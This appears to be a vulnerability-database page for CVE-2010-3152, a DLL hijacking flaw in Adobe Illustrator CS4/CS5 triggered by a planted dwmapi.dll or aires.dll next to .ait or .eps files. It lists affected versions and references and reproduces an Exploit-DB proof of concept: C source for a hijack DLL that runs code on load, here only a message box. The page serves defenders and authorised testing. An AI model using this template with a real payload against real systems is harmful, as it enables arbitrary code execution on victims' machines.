CVE-2010-3152
Description
Untrusted search path vulnerability in Adobe Illustrator CS4 14.0.0, CS5 15.0.1 and earlier, and possibly other versions allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll or aires.dll that is located in the same folder as an .ait or .eps file.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking
/*
Exploit Title: Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v14.0.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .ait .eps
Greetz: Astalavista, OffSEC, Exploit-DB
Note: Create folders system\enu_us and put aires.dll
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_hijack();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_hijack()
{
MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| adobe | illustrator | 14.0 | |
| adobe | illustrator | 15.0.1 | |
References
- http://osvdb.org/67534
- http://secunia.com/advisories/41134
- http://www.adobe.com/support/security/bulletins/apsb10-29.html
- http://www.exploit-db.com/exploits/14773/
- http://www.securityfocus.com/archive/1/513335/100/0/threaded
- http://www.securitytracker.com/id?1024865
- http://www.vupen.com/english/advisories/2010/2198
- http://osvdb.org/67534
- http://secunia.com/advisories/41134
- http://www.adobe.com/support/security/bulletins/apsb10-29.html
- http://www.exploit-db.com/exploits/14773/
- http://www.securityfocus.com/archive/1/513335/100/0/threaded
- http://www.securitytracker.com/id?1024865
- http://www.vupen.com/english/advisories/2010/2198
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.